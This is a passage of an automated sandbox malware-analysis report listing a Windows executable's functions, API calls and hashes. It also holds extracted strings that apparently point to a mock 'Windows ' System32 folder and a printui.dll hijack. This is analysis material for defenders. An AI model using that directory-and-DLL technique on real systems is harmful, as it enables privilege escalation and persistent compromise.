                          • Opcode ID: 3d582bd398a1c9643e454bb3f62672006055f3306ca8626ba99e509735ed638b
                          • Instruction ID: a31ca683a46dcdb6db81acf8af5b5815c5b2a1212da6544c1e0054629e8be73c
                          • Opcode Fuzzy Hash: 3d582bd398a1c9643e454bb3f62672006055f3306ca8626ba99e509735ed638b
                          • Instruction Fuzzy Hash: 0AE04FEAF28B15C7E7207B60D80932966E0BB94B96F104224C70846351DF7C86578650
                          Function 00007FF646E6ADFC Relevance: 1.4, APIs: 1, Instructions: 137COMMON
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32 ref: 00007FF646E6AEA1
                            • Part of subcall function 00007FF646E677C0: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF646E672A7), ref: 00007FF646E67815
                            • Part of subcall function 00007FF646E68670: HeapFree.KERNEL32(?,?,00007FF646E65F93,00007FF646E6F34A,?,?,?,00007FF646E6F6C7,?,?,00000000,00007FF646E6FC41,?,?,?,00007FF646E6FB73), ref: 00007FF646E68686
                            • Part of subcall function 00007FF646E68670: GetLastError.KERNEL32(?,?,00007FF646E65F93,00007FF646E6F34A,?,?,?,00007FF646E6F6C7,?,?,00000000,00007FF646E6FC41,?,?,?,00007FF646E6FB73), ref: 00007FF646E68690
                            • Part of subcall function 00007FF646E71694: _invalid_parameter_noinfo.LIBCMT ref: 00007FF646E716C7
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: ErrorHeapLast$AllocateFree_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3806578645-0
                          • Opcode ID: 8b292681c10ba5506c02ee95be1f95a896873db35b0991908ac7a4bb87d7e974
                          • Instruction ID: a687526142b9215ff0b3aec29407f0218ac908bbed9e7791fa839e17867e3051
                          • Opcode Fuzzy Hash: 8b292681c10ba5506c02ee95be1f95a896873db35b0991908ac7a4bb87d7e974
                          • Instruction Fuzzy Hash: 0641D161F0D24341EA60BA2A68117BAE6D0BF84B80F946135EF4D877C2EE3EE4119700
                          Function 00007FF646E71350 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: HeapProcess
                          • String ID:
                          • API String ID: 54951025-0
                          • Opcode ID: afc3732fb09b00957e6d9b9e59837188e6bcaccd39b1973a2f17ab7d337b00b0
                          • Instruction ID: 5ea24d45a56079c69c87094a161b793755a584d88b75b74d2cc4d527ad91dd93
                          • Opcode Fuzzy Hash: afc3732fb09b00957e6d9b9e59837188e6bcaccd39b1973a2f17ab7d337b00b0
                          • Instruction Fuzzy Hash: DEB09220F0FB06C2EA183B156C8222862E47F88706F944038C44D91320EE2D20A5AB01
                          Function 00007FF646E4DB00 Relevance: .5, Instructions: 474COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8630088bedf43b45efc83e78047511b165fa0e48c8b5310172f303b3592d8840
                          • Instruction ID: 6530ae92e21a0e8785e7c900dd5740c8ad675238f440485ecef3ad41e6b981c6
                          • Opcode Fuzzy Hash: 8630088bedf43b45efc83e78047511b165fa0e48c8b5310172f303b3592d8840
                          • Instruction Fuzzy Hash: 11024522B1C78646EB24BF25E650379E6D5FB54BC4F044136DE4E93BA5DEBEE8408B00
                          Function 00007FF646E43240 Relevance: .4, Instructions: 442COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 63a087eea669627eeaa8c4df526416d5ff6df87c0b67d54210a6f718651d713a
                          • Instruction ID: a3c7550a3a8d0fc1af341c527a151bfd55e3c495a05929dff2095a4825d839cd
                          • Opcode Fuzzy Hash: 63a087eea669627eeaa8c4df526416d5ff6df87c0b67d54210a6f718651d713a
                          • Instruction Fuzzy Hash: 37D16DB1F0C65A47DE28AA3BE411AB9A6D4B794BC0F445035EE4ED3BA0DE7DE905C300
                          Function 00007FF646E42CC0 Relevance: .4, Instructions: 428COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6fd9953bc33474c6735e6af57a768e1f19704400e02921f62bb87ed1167c1393
                          • Instruction ID: 8a2b5f91e3e397ec1a62a5105f6d15ef60594719278461573857899daf4d1e9e
                          • Opcode Fuzzy Hash: 6fd9953bc33474c6735e6af57a768e1f19704400e02921f62bb87ed1167c1393
                          • Instruction Fuzzy Hash: 2CD13A72F0C5560BEB18A92EA581A78E6D5F7D4780F115135DA0AC3BE0EFBAE845C740
                          Function 00007FF646E64BD8 Relevance: .3, Instructions: 310COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: NameTranslate$CodePageValid_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 4003095782-0
                          • Opcode ID: e10e9d0c4bd4698ae2119b11ebc5ed12b49a139d07d8edb5367bd8358ec11802
                          • Instruction ID: 41da470cbc1dc2831f9cbc8538a6aa0930f7ad699985f12b8161d203303acf81
                          • Opcode Fuzzy Hash: e10e9d0c4bd4698ae2119b11ebc5ed12b49a139d07d8edb5367bd8358ec11802
                          • Instruction Fuzzy Hash: 2FC1B566B0C78285EB60BB6195107BAA7E0FB94788F90A035EF8DC7685EE3ED545C700
                          Function 00007FF646E70008 Relevance: .3, Instructions: 268COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          • Opcode ID: 6cb4625e45d58a0910bfd8cdfce76e42e3f73ba13f615c12a1c0a3c670d318e2
                          • Instruction ID: 26a6ef504f9cab8927bc058478b256af383989278426d6a9e7ca1b051352d3fd
                          • Opcode Fuzzy Hash: 6cb4625e45d58a0910bfd8cdfce76e42e3f73ba13f615c12a1c0a3c670d318e2
                          • Instruction Fuzzy Hash: 4EB1DF72A0C68686EB64FFA1C4016B9A3E1FB94B89F404231DA1DD36CBDF3EE5558740
                          Function 00007FF646E55770 Relevance: .3, Instructions: 258COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 909e536e5f028c02a303395f5f4b9b9aa82288cb5e27370e608007b94726d885
                          • Instruction ID: 61c775d357166a8c0d91a90897d32dc421c431c0dad301a2854355d4fa1b850c
                          • Opcode Fuzzy Hash: 909e536e5f028c02a303395f5f4b9b9aa82288cb5e27370e608007b94726d885
                          • Instruction Fuzzy Hash: A4A115A2E1D64286FB24B685C4587B8B7D1FF05BE0F554236CA6D877C2DF6EAC858300
                          Function 00007FF646E62E60 Relevance: .2, Instructions: 207COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          • Opcode ID: 4e86ed7b0f11888a8cf23dd40d8c42b1333a2a400f5e338778c74e58754a8851
                          • Instruction ID: 02b2545448d8a35a5870f7479e39f7a0b8055790ae9bd93e6d06cb6670c8a486
                          • Opcode Fuzzy Hash: 4e86ed7b0f11888a8cf23dd40d8c42b1333a2a400f5e338778c74e58754a8851
                          • Instruction Fuzzy Hash: C681A032A1CA1186EB50FE25D48137D63A0FB44B98F906636EF6E87785DF3AD4428340
                          Function 00007FF646E71B84 Relevance: .2, Instructions: 183COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          • Opcode ID: 3fad3349443e4352ca4563b4ee5ec969484cc0914d58ee3d7b4fc483fe2e7ef2
                          • Instruction ID: d1fa9f77fc621c00310aa1d31bb5549c29928ad88435889dcc608461819f54c4
                          • Opcode Fuzzy Hash: 3fad3349443e4352ca4563b4ee5ec969484cc0914d58ee3d7b4fc483fe2e7ef2
                          • Instruction Fuzzy Hash: 5761A622E1C79246FB68BA6984442F9E6D1BF40763F584235DB5DC6AC6DF6FE8008B00
                          Function 00007FF646E65EDC Relevance: .1, Instructions: 125COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 485612231-0
                          • Opcode ID: a26e0b7e733c20988fe20099792aab32ae393d089d120619116f29894ba203d9
                          • Instruction ID: 526c80e6f7b3c7bc8dbaaaba446c0aea842043bef0c42ced6a17694b5087df56
                          • Opcode Fuzzy Hash: a26e0b7e733c20988fe20099792aab32ae393d089d120619116f29894ba203d9
                          • Instruction Fuzzy Hash: C141E562B2CA5581EF44EF2AD954169B3E1B748FC0B59A032DE0DC7B58EE7EC4428300
                          Function 00007FF646E73080 Relevance: .0, Instructions: 50COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d478a4e633571b100eff9937f2f319f24f786d33950d94471d75dc4775c8fb78
                          • Instruction ID: 7174b50f9b739396638ae0b0088a3ac25849459ffbd89a31a63de269dd539783
                          • Opcode Fuzzy Hash: d478a4e633571b100eff9937f2f319f24f786d33950d94471d75dc4775c8fb78
                          • Instruction Fuzzy Hash: 731182B1B1C28386F7A9BB28D451339B7E0BB44386F508039C88DC6691DE7F90909F00
                          Function 00007FF646E5B9E0 Relevance: .0, Instructions: 2COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4c5d79c6fb8e57b0788135a22f2493030c6b79ed2c5f3866b13dce419ad53cb2
                          • Instruction ID: 1328370ac41996b623a801a3a3742ff1268c92b0f5fc3f9f73eaaad72ddc4ca9
                          • Opcode Fuzzy Hash: 4c5d79c6fb8e57b0788135a22f2493030c6b79ed2c5f3866b13dce419ad53cb2
                          • Instruction Fuzzy Hash: C3A00261A0DC17D0E785BF41E8A4034A7B4FB60315B400131D00DC14A29F3FE448C340
                          Function 00007FF646E45EB0 Relevance: 33.5, APIs: 11, Strings: 8, Instructions: 285COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: DirectorySystem
                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$mkdir "\\?\{}Windows \System32"${}Windows \System32${}Windows \System32\printui.dll${}Windows \System32\printui.exe${}Windows\System32\printui.exe
                          • API String ID: 2188284642-3176087396
                          • Opcode ID: 98b50da478baaa1de672331d57bb35c1ec3c883be076bdde22644114fde739cf
                          • Instruction ID: 2a618bd0c3765c403efcc3002e46297dc24174857e9af96a8d3b370b810929cf
                          • Opcode Fuzzy Hash: 98b50da478baaa1de672331d57bb35c1ec3c883be076bdde22644114fde739cf
                          • Instruction Fuzzy Hash: 33F1193252CBC695E661AB14F4803EAF3A0FBD8344F505126EBCD92A59EF7DD184CB50
                          Function 00007FF646E4F410 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 221COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Missing '}' in format string.$Number is too big$Unknown format specifier.
                          • API String ID: 909987262-3302395901
                          • Opcode ID: f852bf43495b18fcd690be9e3e28f9d983a114facf201d046bf2690be2c80a98
                          • Instruction ID: fbe5247983a96eb794997848c01b09321318f7f044650f1a9b49ab950d7745d9
                          • Opcode Fuzzy Hash: f852bf43495b18fcd690be9e3e28f9d983a114facf201d046bf2690be2c80a98
                          • Instruction Fuzzy Hash: 02918D32A0CA4685EB10BF75D4502BCB3B1FB84B88F544232DA0D93699EFBEE559C340
                          Function 00007FF646E58974 Relevance: 21.2, APIs: 14, Instructions: 192fileCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: Handle$Close$File$ErrorLast$CopyCreate$Information
                          • String ID:
                          • API String ID: 1679173910-0
                          • Opcode ID: cdc2370f03e498abcb4d903f02943b37053576bc7416c231958bfc27685e064e
                          • Instruction ID: c9c3e66688bdba9477d83bda997b551a4f864aee477c1f7786761fc6994f70a3
                          • Opcode Fuzzy Hash: cdc2370f03e498abcb4d903f02943b37053576bc7416c231958bfc27685e064e
                          • Instruction Fuzzy Hash: F9816161F0C65289F7A0BBB594402BEA7E5BB047A8F040B35CE6D97AD9DF3AD506C340
                          Function 00007FF646E52E10 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 423COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~__invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFacet_RegisterXinvalid_argument
                          • String ID: integral cannot be stored in wchar_t
                          • API String ID: 3363080787-1689078516
                          • Opcode ID: 33d60e48c9cc2b1c7334e3df05d72950c53ea0b52d52df320c4881f80e9dcc3c
                          • Instruction ID: ee94f54dd32c0cf393a57da76dae798da08934651ed32bf067941dd4b0c75d03
                          • Opcode Fuzzy Hash: 33d60e48c9cc2b1c7334e3df05d72950c53ea0b52d52df320c4881f80e9dcc3c
                          • Instruction Fuzzy Hash: 3A029432A1CB8185EB11FBA9D4402BDB7E0FB44794F944236EA9D87A99EF3DD485C700
                          Function 00007FF646E525A0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 123COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big$Precision not allowed for this argument type.
                          • API String ID: 909987262-435359029
                          • Opcode ID: 655d5505bb36caab243fe4db9d9417e084068b7e30e5faad357a348e62d825d5
                          • Instruction ID: f9d482c8161e6f572ed8008a3a928a1bf3c401e32ebd9962575924c8b8424e5b
                          • Opcode Fuzzy Hash: 655d5505bb36caab243fe4db9d9417e084068b7e30e5faad357a348e62d825d5
                          • Instruction Fuzzy Hash: 9341D132A0C9868AEA25FB28D4502B9A3E0FF51744F944132D75DC36E6EF2FE595C740
                          Function 00007FF646E5928C Relevance: 16.7, APIs: 11, Instructions: 157COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
